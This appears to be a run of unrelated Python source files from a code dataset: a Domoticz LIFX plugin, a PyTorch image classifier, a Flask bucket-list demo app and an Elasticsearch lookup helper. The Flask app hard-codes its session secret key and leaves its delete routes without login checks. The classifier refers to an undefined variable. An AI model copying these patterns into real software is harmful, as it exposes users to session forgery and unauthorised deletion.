_plugin.onConnect(Status, Description)\n\ndef onMessage(Data, Status, Extra):\n global _plugin\n _plugin.onMessage(Data, Status, Extra)\n\ndef onCommand(Unit, Command, Level, Hue):\n global _plugin\n _plugin.onCommand(Unit, Command, Level, Hue)\n\ndef onNotification(Data):\n global _plugin\n _plugin.onNotification(Data)\n\ndef onDisconnect():\n global _plugin\n _plugin.onDisconnect()\n\ndef onHeartbeat():\n global _plugin\n _plugin.onHeartbeat()\n\n # Generic helper functions\ndef DumpConfigToLog():\n for x in Parameters:\n if Parameters[x] != \"\":\n Domoticz.Debug( \"'\" + x + \"':'\" + str(Parameters[x]) + \"'\")\n Domoticz.Debug(\"Device count: \" + str(len(Devices)))\n for x in Devices:\n Domoticz.Debug(\"Device: \" + str(x) + \" - \" + str(Devices[x]))\n Domoticz.Debug(\"Device ID: '\" + str(Devices[x].ID) + \"'\")\n Domoticz.Debug(\"Device Name: '\" + Devices[x].Name + \"'\")\n Domoticz.Debug(\"Device nValue: \" + str(Devices[x].nValue))\n Domoticz.Debug(\"Device sValue: '\" + Devices[x].sValue + \"'\")\n Domoticz.Debug(\"Device LastLevel: \" + str(Devices[x].LastLevel))\n return\n\ndef UpdateDevice(Unit, nValue, sValue):\n # Make sure that the Domoticz device still exists (they can be deleted) before updating it \n if (Unit in Devices):\n if (Devices[Unit].nValue != nValue) or (Devices[Unit].sValue != sValue):\n Devices[Unit].Update(nValue, str(sValue))\n Domoticz.Debug(\"Update \"+str(nValue)+\":'\"+str(sValue)+\"' (\"+Devices[Unit].Name+\")\")\n return\n\ndef UpdateDevice2(Unit, nValue, sValue, Color):\n # Make sure that the Domoticz device still exists (they can be deleted) before updating it \n if (Unit in Devices):\n Domoticz.Debug (\">>>>>>>>>>Color: \" + \"' (\"+Devices[Unit].Name+\") \" + Devices[Unit].Color)\n if (Devices[Unit].nValue != nValue) or (Devices[Unit].sValue != sValue):\n Devices[Unit].Update(nValue=nValue, sValue=str(sValue), Color=Color)\n Domoticz.Debug(\"LIFX Update \"+str(nValue)+\":'\"+str(sValue)+\"' (\"+Devices[Unit].Name+\")\" + \" Color \" + Color)\n return\n\ndef stringToBase64(s):\n return base64.b64encode(s.encode('utf-8')).decode(\"utf-8\")\n\ndef queryLIFX(Command=\"get_light_state\", Params=\"*\"):\n request = json.dumps({\"method\": Command, \"params\": [Params], \"jsonrpc\": \"2.0\",\"id\": str(random.randint(1, 50)),}).encode(ENCODING, \"surrogateescape\")\n _plugin.lightsd_socket.sendall(request)\n response = bytearray()\n while True:\n response += _plugin.lightsd_socket.recv(READ_SIZE)\n try:\n json.loads(response.decode(ENCODING, \"ignore\"))\n break\n except Exception:\n continue\n response = response.decode(ENCODING, \"surrogateescape\")\n return json.loads(response)[\"result\"]\n \ndef setLIFX(Command, Params=[\"*\"]):\n request = json.dumps({\"method\": Command, \"params\": Params, \"jsonrpc\": \"2.0\",}).encode(ENCODING, \"surrogateescape\")\n Domoticz.Debug(\"request: \" + str(request))\n _plugin.lightsd_socket.sendall(request) \n return\n\ndef rgb_to_hsv(r, g, b):\n r = float(r)\n g = float(g)\n b = float(b)\n high = max(r, g, b)\n low = min(r, g, b)\n h, s, v = high, high, high\n d = high - low\n s = 0 if high == 0 else d/high\n if high == low:\n h = 0.0\n else:\n h = {r: (g - b) / d + (6 if g < b else 0), g: (b - r) / d + 2, b: (r - g) / d + 4,}[high]\n h /= 6\n h = int (h*360)\n return h, s, v\n\ndef hsv_to_rgb(h, s, v):\n h /= 360\n i = math.floor(h*6)\n f = h*6 - i\n p = v * (1-s)\n q = v * (1-f*s)\n t = v * (1-(1-f)*s)\n r, g, b = [(v, t, p),(q, v, p),(p, v, t),(p, q, v),(t, p, v),(v, p, q),][int(i%6)]\n r *=255\n g *=255\n b *=255\n return int(r), int(g), int(b)\n\ndef translate(value, leftMin, leftMax, rightMin, rightMax):\n leftSpan = leftMax - leftMin\n rightSpan = rightMax - rightMin\n valueScaled = float(value - leftMin) / float(leftSpan)\n return int(rightMin + (valueScaled * rightSpan))","sub_path":"plugins/Lifx/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":12811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472171677","text":"import torch\nimport torch.nn as nn \nimport torch.nn.functional as F \nimport torch.optim as optim\nimport torchvision.transforms as transforms\n#from tqdm import tqdm\nfrom tqdm.notebook import tqdm\nimport os\nimport time\nfrom PIL import Image\n\nclass CNNClassifier(nn.Module):\n\n def __init__(self, device):\n super(CNNClassifier, self).__init__()\n self.block1 = self.conv_block(c_in=3, c_out=256, dropout=0.1, kernel_size=5, stride=1, padding=2)\n self.block2 = self.conv_block(c_in=256, c_out=128, dropout=0.1, kernel_size=3, stride=1, padding=1)\n self.block3 = self.conv_block(c_in=128, c_out=64, dropout=0.1, kernel_size=3, stride=1, padding=1)\n self.lastcnn = nn.Conv2d(in_channels=64, out_channels=2, kernel_size=56, stride=1, padding=0)\n self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2)\n self.device = device\n self.criterion = torch.nn.CrossEntropyLoss()\n self.optimizer = optim.Adam(self.parameters(), lr=0.008)\n\n def forward(self, x):\n x = self.block1(x)\n x = self.maxpool(x)\n x = self.block2(x)\n x = self.block3(x)\n x = self.maxpool(x)\n x = self.lastcnn(x)\n return x\n\n def conv_block(self, c_in, c_out, dropout, **kwargs):\n seq_block = nn.Sequential(\n nn.Conv2d(in_channels=c_in, out_channels=c_out, **kwargs),\n nn.BatchNorm2d(num_features=c_out),\n nn.ReLU(),\n nn.Dropout2d(p=dropout)\n )\n return seq_block\n\n def trainCNN(self, train_loader):\n print(\"Begin training...\")\n self.t_begin = time.time()\n for e in tqdm(range(1, 15)):\n train_epoch_loss = 0\n train_epoch_acc = 0\n self.train()\n for X_train_batch, y_train_batch in train_loader: \n X_train_batch, y_train_batch = X_train_batch.to(self.device), y_train_batch.to(self.device)\n self.optimizer.zero_grad()\n y_train_pred = self(X_train_batch).squeeze() # returns a tensor with all the dimensions of input of size 1 removed.\n #print(\"real: \", y_train_batch)\n #print(\"prediction: \", y_train_pred )\n train_loss = self.criterion(y_train_pred, y_train_batch)\n train_acc = self.binary_acc(y_train_pred, y_train_batch)\n train_loss.backward()\n self.optimizer.step()\n train_epoch_loss += train_loss.item()\n train_epoch_acc += train_acc.item()\n print(f'Epoch {e+0:02}: | Train Loss: {train_epoch_loss/len(train_loader):.5f} | Train Acc: {train_epoch_acc/len(train_loader):.3f}')\n self.t_end = time.time()\n print('Time of training-{}'.format((self.t_end - self.t_begin)))\n # Save the trained parameters\n #self.save_model()\n\n def evaluate(self, test_loader, best_acc=0): \n print(\"Begin testing...\")\n with torch.no_grad():\n self.eval()\n test_epoch_loss = 0\n test_epoch_acc = 0\n\n for x_batch, y_batch in tqdm(test_loader):\n x_batch, y_batch = x_batch.to(self.device), y_batch.to(self.device)\n y_test_pred = self(x_batch)\n _, y_pred_tag = torch.max(y_test_pred, dim = 1)\n y_test_pred = y_test_pred.squeeze()\n #y_test_pred = torch.unsqueeze(y_test_pred, 0)\n\n test_acc = self.binary_acc(y_test_pred, y_batch)\n test_loss = self.criterion(y_test_pred, y_batch)\n test_epoch_loss += test_loss.item()\n test_epoch_acc += test_acc.item()\n test_epoch_acc/=len(test_loader)\n print(f'Test Loss: {test_epoch_loss/len(test_loader):.5f} | Test Acc: {test_epoch_acc:.3f}')\n if test_epoch_acc > best_acc:\n print('Saving model..')\n state = {\n 'model': self.state_dict(),\n 'accuracy': test_epoch_acc,\n }\n print(\"with accuracy:\", state['accuracy'])\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save(state, './checkpoint/model.pth')\n\n\n def predict(self, filename, image_size):\n image = Image.open(filename, mode = 'r') #reading an image.\n #image = np.array(image) #the 2-d array of integer pixel values \n #image = image/255.0 #toTensor transform will bring from [0,255] tp [0, 1]\n preproc=transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n input_image = preproc(image)\n input_image = input_image.view(1, input_image.size(0), input_image.size(1), input_image.size(2))\n input_image = input_image.to(self.device)\n print(input_image.size())\n with torch.no_grad():\n self.eval()\n y_pred = self(input_image) \n print(\"pure prediction: \", y_pred)\n y_pred_tag = torch.log_softmax(y_pred, dim = 1)\n print(\"after softmax: \", y_pred_tag)\n _, y_pred_tag = torch.max(y_pred_tag, dim = 1)\n print(\"final output: \", y_pred_tag)\n return y_pred_tag\n \n\n \"\"\"\n Predicts the label of test data. It stores misclassified\n images for later inspection.\n\n Parameters:\n - test_loader: DataLoader to be predicted.\n - save_dir: The base directory to save images\n \"\"\"\n @torch.no_grad()\n def predict_batched(self, test_loader, save_dir='.'):\n correct_num = 0\n i_ter = 0\n tot = len(test_loader.dataset)\n self.eval()\n\n for x_batch, y_batch in tqdm(test_loader):\n\n x_batch, y_batch = x_batch.to(self.device), y_batch.to(self.device)\n y_pred = self(x_batch)\n y_pred_tag = torch.log_softmax(y_pred, dim = 1)\n _, y_pred_tag = torch.max(y_pred_tag, dim = 1)\n y_pred_tag = y_pred_tag.squeeze() # Flatten big boy\n\n correct_num += sum(y_pred_tag == y_batch)\n\n # Save each image in the batch if misclassified\n for idx, (expected, actual) in enumerate(zip(y_batch, y_pred_tag)):\n\n if expected == actual:\n continue\n\n name = f'{i_ter}.png'\n i_ter += 1\n tensor_image = x_batch[idx]*0.5 + 0.5\n\n self.dispatch_to_folder(save_dir, expected, actual, tensor_image, name)\n\n print(f'Total images: {tot}\\nCorrectly classfied: {correct_num}')\n\n def dispatch_to_folder(self, save_dir, expected, actual, tensor_image, name):\n misclassified_as_sink = os.path.join(save_dir, 'as_sink')\n\n if not os.path.isdir(misclassified_as_sink):\n os.mkdir(misclassified_as_sink)\n\n misclassified_as_handwash = os.path.join(save_dir, 'as_handwash')\n\n if not os.path.isdir(misclassified_as_handwash):\n os.mkdir(misclassified_as_handwash)\n \n if expected == 0 and actual == 1:\n # Handwashing misclassified as sink\n file_path = os.path.join(misclassified_as_sink, name)\n save_image(tensor_image, file_path)\n\n if expected == 1 and actual == 0:\n # Sink misclassified as handwashing\n file_path = os.path.join(misclassified_as_handwash, name)\n save_image(tensor_image, file_path)\n\n\n @torch.no_grad()\n def predict_video(self, path, save_dir, every=None):\n self.eval()\n idx = 0\n preproc=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n\n for image in self.image_generator(path, every):\n if image is None:\n break\n \n input_image = preproc(image)\n input_image = input_image.view(1, input_image.size(0), input_image.size(1), input_image.size(2))\n input_image = input_image.to(self.device)\n\n y_pred = self(input_image)\n y_pred_tag = torch.log_softmax(y_pred, dim = 1)\n _, y_pred_tag = torch.max(y_pred_tag, dim = 1)\n y_pred_tag = y_pred_tag.squeeze()\n tag = y_pred_tag.item()\n \n # Save tensor as img\n\n if not os.path.isdir(save_dir):\n os.mkdir(save_dir)\n img_path = os.path.join(save_dir, f'{idx}-{tag}.png')\n save_image(input_image[0]*0.5 + 0.5, img_path)\n idx += 1\n\n\n \"\"\"\n Yields all frames from a video.\n\n Parameters:\n - path: Path to load the video from.\n - resize: tuple defining dimensions of new image.\n - every: Every how many frame to yield a frame. E.g.\n every = 30, means yield a frame every 30 frames.\n None for all frames.\n \"\"\"\n def image_generator(self, path, resize=(224, 224), every=None):\n cap = cv2.VideoCapture(path)\n count = 0\n try:\n while True:\n ret, frame = cap.read()\n if not ret:\n break\n frame = cv2.resize(frame, resize)\n frame = frame[:, :, [2, 1, 0]]\n image = Image.fromarray(frame)\n if every is None or count % every == 0:\n yield image\n\n count += 1\n finally:\n cap.release()\n\n yield None\n\n \n def binary_acc(self, y_pred, y_test):\n y_pred_tag = torch.log_softmax(y_pred, dim = 1)\n _, y_pred_tags = torch.max(y_pred_tag, dim = 1)\n correct_results_sum = (y_pred_tags == y_test).sum().float()\n acc = correct_results_sum/y_test.shape[0]\n acc = torch.round(acc * 100)\n return acc\n\n\n \"\"\"def load_model(self, D_model_filename = './discriminator.pkl', G_model_filename = './generator.pkl'):\n D_model_path = os.path.join(os.getcwd(), D_model_filename)\n G_model_path = os.path.join(os.getcwd(), G_model_filename)\n self.D.load_state_dict(torch.load(D_model_path))\n self.G.load_state_dict(torch.load(G_model_path))\n print('Generator model loaded from {}.'.format(G_model_path))\n print('Discriminator model loaded from {}-'.format(D_model_path))\"\"\"\n\n\nclass CNN(nn.Module): \n def __init__(self, image_size=128, channels=3): \n super().__init__()\n self.conv1 = nn.Conv2d(3, 6, 5)\n # we use the maxpool multiple times, but define it once\n self.pool = nn.MaxPool2d(2,2)\n # in_channels = 6 because self.conv1 output 6 channel\n self.conv2 = nn.Conv2d(6,16,5) \n # 5*5 comes from the dimension of the last convnet layer\n self.fc1 = nn.Linear(16*5*5, 120) #input is 400 as it is flatten after previous layer of 16x5x5\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n self.main = nn.Sequential(\n # input is (channels) x image_size x image_size; (image_size = 128)\n nn.Conv2d(channels, ndf, 4, 2, 1, bias=False), #in_channels, out_channels, kernel_size, stride=1, padding=0\n nn.LeakyReLU(0.2, inplace=True), \n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*4) x 8 x 8\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*8) x 4 x 4\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n )\n\n \"\"\"model = models.Sequential()\n model.add(Conv2D(16, (15, 15), activation='relu', input_shape=(64, 64,1))) #filters, kernel_size, strides\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(32, (7, 7), activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (5, 5), activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n #model.add(layers.Dense(2)) # for sparse_categorial_crossentropy - then choose 2 neurons in next layer\n model.add(layers.Dense(1, activation='sigmoid'))\n opt = tf.keras.optimizers.Adam(lr=0.0005, decay=1e-6)\n model.compile(optimizer= opt , loss= tf.keras.losses.binary_crossentropy, metrics=['accuracy'])\"\"\"\n\n\n\n def forward(self, x): \n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = x.view(-1, 16*5*5)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x) # no activation on final layer \n return x\n\n\n\"\"\"\nclass Discriminator(nn.Module):\n def __init__(self, ngpu, nc, ndf):\n super(Discriminator, self).__init__()\n self.ngpu = ngpu\n self.main = nn.Sequential(\n # input is (nc) x 64 x 64\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*4) x 8 x 8\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*8) x 4 x 4\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n )\n \n def forward(self, input):\n return self.main(input)\n\n\"\"\"\n\n\"\"\"\ndef create_model(self):\n # highest accuracy liveness on non-diffused iages- 16 (13,13) => 32 (7,7) => 64 (5,5) => 64 => 1 - acc = 94.2\n model = models.Sequential()\n model.add(Conv2D(16, (15, 15), activation='relu', input_shape=(64, 64,1)))\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(32, (7, 7), activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (5, 5), activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n #model.add(layers.Dense(2)) # for sparse_categorial_crossentropy - then choose 2 neurons in next layer\n model.add(layers.Dense(1, activation='sigmoid'))\n opt = tf.keras.optimizers.Adam(lr=0.0005, decay=1e-6)\n model.compile(optimizer= opt , loss= tf.keras.losses.binary_crossentropy, metrics=['accuracy'])\n return model\n\n def load_model(self,model_file_name):\n model = tf.keras.models.load_model(model_file_name)\n return model\n\n def train_model(self, model, train_images,train_labels,test_images, test_labels, epochs):\n cbk = CustomModelCheckpoint() # so that we can save the best model\n history = model.fit(train_images, train_labels, epochs=epochs, callbacks=[cbk], \n validation_data=(test_images, test_labels))\n #plt.plot(history.history['accuracy'], label='accuracy')\n #plt.plot(history.history['val_accuracy'], label = 'val_accuracy')\n #plt.xlabel('Epoch')\n #plt.ylabel('Accuracy')\n #plt.ylim([0.5, 1])\n #plt.legend(loc='lower right')\n #plt.show()\n return model\n\n def evaluate(self, model, test_images, test_labels):\n test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n return test_loss, test_acc\n\"\"\"\n","sub_path":"models/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":16451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"593025276","text":"from flask import Flask\nfrom models import User\nfrom models import BucketList\nfrom models import Entry\nfrom flask import request, url_for\nfrom flask import session, render_template, redirect\nfrom flask_bower import Bower\nfrom flask_login import LoginManager\nfrom flask_login import login_user\nfrom flask_login import login_required\nfrom flask_login import current_user\nfrom flask_login import logout_user\n\napp = Flask(__name__)\napp.secret_key = 's\\xb2\\xf9?\\xeeu\\xc2\\nB\\xaf\\x97\\xecJ\\x03\\x82Sv\\xef\\x9e_\\x03\\xd3Fw'\nBower(app)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n\n@login_manager.user_loader\ndef user_loader(user_id):\n \"\"\"Given *user_id*, return the associated User object.\n :param unicode user_id: user_id (email) user to retrieve\n \"\"\"\n try:\n user = User.find_by_email(user_id)\n return user\n except KeyError:\n return None\n\n\n@app.route('/login', methods=['POST', 'GET'])\ndef login():\n email = None\n password = None\n error = None\n\n \"\"\"For GET requests, display the login form. For POSTS, login the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n email = request.form['email']\n password = request.form['password']\n\n try:\n user = User.find_by_email(email)\n if user.check_password(user.user_password, password):\n user.authenticated = True\n\n # Login and validate the user.\n # user should be an instance of your `User` class\n login_user(user, remember=True)\n\n # redirect to the home page\n return redirect(url_for('home'))\n else:\n error = 'You have entered invalid credentials'\n return render_template('login.html', error=error)\n\n except:\n error = 'The email does not exist'\n return render_template('login.html', error=error)\n\n return render_template('login.html', error=error)\n\n\n@app.route('/create_account', methods=['POST', 'GET'])\ndef create_account():\n first_name = None\n last_name = None\n user_name = None\n user_password = None\n email = None\n contact_no = None\n error = None\n\n \"\"\"For GET requests, display the registraion form. For POSTS, register the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n user_name = request.form['user_name']\n user_password = request.form['user_password']\n email = request.form['email']\n contact_no = request.form['contact_no']\n\n if email in User.email_index:\n error = 'User with the email already exists'\n return render_template('createaccount.html', error=error)\n else:\n user = User(first_name, last_name, user_name, user_password, email, contact_no)\n # redirect to the login page\n return redirect(url_for('login'))\n else:\n return render_template('createaccount.html', error=error)\n\n\n@app.route('/logout')\ndef logout():\n \"\"\"Logout the current user.\"\"\"\n user = current_user\n user.authenticated = False\n logout_user()\n return render_template(\"logout.html\")\n\n\n@app.route('/home')\n@login_required\ndef home():\n \"\"\"Display home page.\"\"\"\n user = current_user\n return render_template('home.html', user=user)\n\n\n@app.route('/create_bucketlist', methods=['POST', 'GET'])\n@login_required\ndef create_bucketlist():\n \"\"\"Display create bucket list page.\"\"\"\n title = None\n description = None\n error = None\n user = current_user\n\n \"\"\"For GET requests, display the registraion form. For POSTS, register the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n title = request.form['title']\n description = request.form['description']\n\n try:\n u = User.find_by_email(user.email)\n bucket_list = BucketList(title, description)\n bucket_list.add_user(u)\n u.create_bucketlist(bucket_list)\n return redirect(url_for('home'))\n except KeyError:\n error = \"No user found\"\n return render_template('create_bucketlist.html', error=error)\n else:\n return render_template('create_bucketlist.html', error=error)\n\n\n@app.route('/update_bucketlist', methods=['POST', 'GET'])\n@login_required\ndef update_bucketlist():\n \"\"\"Display create bucket list page.\"\"\"\n title = None\n description = None\n error = None\n user = current_user\n bucket_list_id = request.args.get('id')\n bucket_list = None\n\n \"\"\"For GET requests, display the registraion form. For POSTS, register the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n title = request.form['title']\n description = request.form['description']\n id = request.form['id']\n try:\n u = User.find_by_email(user.email)\n for b in u.bucket_lists:\n if b.id == int(id):\n b.title = title\n b.description = description\n return redirect(url_for('home'))\n except KeyError:\n error = \"No user found\"\n return render_template('home.html')\n else:\n u = User.find_by_email(user.email)\n bucket_lists = u.bucket_lists\n for b in bucket_lists:\n if b.id == int(bucket_list_id):\n bucket_list = b\n return render_template('bucketlist_update.html', bucket_list=bucket_list)\n\n\n@app.route('/bucketlist_detail')\n@login_required\ndef bucketlist_detail():\n user = current_user\n id = request.args.get('id')\n bucket_list = None\n try:\n u = User.find_by_email(user.email)\n for b in u.bucket_lists:\n if b.id == int(id):\n bucket_list = b\n except KeyError:\n bucket_list = None\n\n return render_template('bucketlist_detail.html', bucket_list=bucket_list)\n\n\n@app.route('/bucketlist_delete', methods=['POST', 'GET'])\ndef bucketlist_delete():\n id = None\n user = current_user\n\n \"\"\"For GET requests, display the login form. For POSTS, login the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n id = request.form['id']\n u = User.find_by_email(user.email)\n try:\n for i, b in enumerate(u.bucket_lists):\n if b.id == int(id):\n del u.bucket_lists[i]\n break\n return redirect(url_for('home'))\n except:\n return render_template('home.html')\n else:\n return render_template('home.html')\n\n\n@app.route('/create_entry', methods=['GET', 'POST'])\n@login_required\ndef create_entry():\n \"\"\"Display entries list page.\"\"\"\n title = None\n content = None\n error = None\n\n \"\"\"For GET requests, display the registraion form. For POSTS, register the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n title = request.form['title']\n content = request.form['content']\n bucket_list_id = request.form['bucket_list_id']\n try:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entry = Entry(title, content, int(bucket_list_id))\n bucket_list.add_entry(entry)\n return redirect(url_for('show_entries', id=[int(bucket_list_id)]))\n except KeyError:\n error = \"No bucket list found\"\n return render_template('create_entry.html', error=error)\n else:\n bucket_list_id = request.args.get('id')\n return render_template('create_entry.html', bucket_list_id=bucket_list_id)\n\n\n@app.route('/show_entries')\n@login_required\ndef show_entries():\n entries = []\n bucket_list_id = request.args.get('id')\n\n try:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entries = bucket_list.entries\n except KeyError:\n entries = []\n\n return render_template('show_entries.html', entries=entries, bucket_list_id=bucket_list_id)\n\n\n@app.route('/entry_detail')\n@login_required\ndef entry_detail():\n entry = None\n entry_id = request.args.get('entry_id')\n bucket_list_id = request.args.get('bucket_list_id')\n try:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entries = bucket_list.entries\n\n for e in entries:\n if e.id == int(entry_id):\n entry = e\n except KeyError:\n entry = None\n\n return render_template('entry_detail.html', entry=entry)\n\n\n@app.route('/entry_update', methods=['GET', 'POST'])\n@login_required\ndef entry_update():\n \"\"\"Display entries list page.\"\"\"\n title = None\n content = None\n error = None\n entry_id = None\n bucket_list_id = None\n entry = None\n\n entry_id = request.args.get('entry_id')\n bucket_list_id = request.args.get('bucket_list_id')\n\n \"\"\"For GET requests, display the registraion form. For POSTS, register the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n title = request.form['title']\n content = request.form['content']\n entry_id = request.form['entry_id']\n bucket_list_id = request.form['bucket_list_id']\n try:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entries = bucket_list.entries\n\n for e in entries:\n if e.id == int(entry_id):\n e.title = title\n e.content = content\n break\n bucket_list.entries = entries\n\n return redirect(url_for('entry_detail', entry_id=[int(entry_id)], bucket_list_id=[int(bucket_list_id)]))\n except KeyError:\n error = \"No entry found\"\n return render_template('entry_update.html', error=error)\n else:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entries = bucket_list.entries\n for e in entries:\n if e.id == int(entry_id):\n entry = e\n return render_template('entry_update.html', entry=entry)\n\n\n@app.route('/entry_delete', methods=['POST', 'GET'])\ndef entry_delete():\n entry_id = None\n bucket_list_id = None\n bucket_list = None\n entries = None\n\n \"\"\"For GET requests, display the login form. For POSTS, login the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n entry_id = request.form['entry_id']\n bucket_list_id = request.form['bucket_list_id']\n try:\n bucket_list = BucketList.find_by_id(int(bucket_list_id))\n entries = bucket_list.entries\n\n for i, e in enumerate(entries):\n if e.id == int(entry_id):\n del entries[i]\n break\n bucket_list.entries = entries\n return redirect(url_for('show_entries', id=[int(bucket_list_id)]))\n except:\n entries = bucket_list.entries\n return render_template('show_entries.html', id=[int(bucket_list_id)])\n else:\n return render_template('show_entries.html', id=[int(bucket_list_id)])\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"flask_demo.py","file_name":"flask_demo.py","file_ext":"py","file_size_in_byte":11226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330497032","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport re\nimport sys\nfrom os import path\nfrom tornado.options import options\nfrom elasticsearch import Elasticsearch\n\nBASE_DIR = path.dirname(path.dirname(path.dirname(path.dirname(__file__))))\nsys.path.append(BASE_DIR)\n\nfrom controller.helper import load_config\nfrom controller.page.tool.diff import Diff\nfrom controller.page.tool.variant import normalize\n\n\ndef get_hosts():\n config = load_config() or {}\n hosts = [config.get('esearch') or {'host': '47.95.216.233', 'post': 9200}]\n if hasattr(options, 'testing') and options.testing:\n hosts = [dict(host='dev.tripitakas.net')]\n return hosts\n\n\ndef find(q, index='cb4ocr-ik'):\n \"\"\" 从ES中寻找与q最匹配的document \"\"\"\n if not q:\n return []\n\n if re.match(r'^[0-9a-zA-Z_]+', q):\n match = {'page_code': q}\n else:\n ocr = re.sub(r'[\\x00-\\xff]', '', q)\n ocr = re.sub(Diff.cmp_junk_char, '', ocr)\n match = {'normal': normalize(ocr)}\n\n dsl = {\n 'query': {'match': match},\n 'highlight': {'pre_tags': [''], 'post_tags': [''], 'fields': {'normal': {}}}\n }\n\n es = Elasticsearch(hosts=get_hosts())\n r = es.search(index=index, body=dsl)\n\n return r['hits']['hits']\n\n\ndef find_one(ocr, num=1, only_match=False):\n \"\"\" 从ES中寻找与ocr最匹配的document,返回第num个结果 \"\"\"\n ocr = ''.join(ocr) if isinstance(ocr, list) else ocr.replace('|', '')\n ret = find(ocr)\n if not ret or num - 1 not in range(0, len(ret)):\n return '', []\n hit_page_codes = [r['_source']['page_code'] for r in ret]\n cb = ''.join(ret[num - 1]['_source']['origin'])\n diff = Diff.diff(ocr, cb, label=dict(base='ocr', cmp1='cb'))[0]\n if only_match:\n # 寻找第一个和最后一个同文\n start, end = None, None\n for i, d in enumerate(diff):\n if d.get('is_same') and start is None:\n start = i\n if diff[-i - 1].get('is_same') and end is None:\n end = len(diff) - i - 1\n if start is not None and end is not None:\n break\n diff1 = diff[start: end + 1]\n # 处理diff1中前面几个异文超长的情况\n diff2 = [d for d in diff1 if not d.get('is_same')][:4]\n for d in diff2:\n if len(d.get('cb', '')) - len(d.get('ocr', '')) > 3:\n d['cb'] = '■' * len(d['ocr'])\n txt = ''.join([d['cb'] for d in diff1])\n if end < len(diff) - 1 and not diff[end + 1].get('is_same'):\n last = diff[end + 1]\n txt += last['cb'][:len(last['ocr'])]\n else:\n txt = ''.join(['%s' % d['cb'] if d.get('is_same') else d['cb'] for d in diff])\n return txt.strip('\\n'), hit_page_codes\n\n\ndef find_neighbor(page_code, neighbor='next'):\n \"\"\" 从ES中寻找page_code的前一页或后一页记录 \"\"\"\n assert neighbor in ['prev', 'next']\n head = re.search(r'^([A-Z]{1,2}\\d+n[A-Z]?\\d+[A-Za-z_]?)p([a-z]?\\d+)', page_code)\n page_no = head.group(2)\n neighbor_no = str(int(page_no) + 1 if neighbor == 'next' else int(page_no) - 1).zfill(len(page_no))\n neighbor_code = '%sp%s' % (head.group(1), neighbor_no)\n neighbor_node = find(neighbor_code)\n return neighbor_node and neighbor_node[0]\n\n\nif __name__ == '__main__':\n import pymongo\n\n # print([r['_source'] for r in 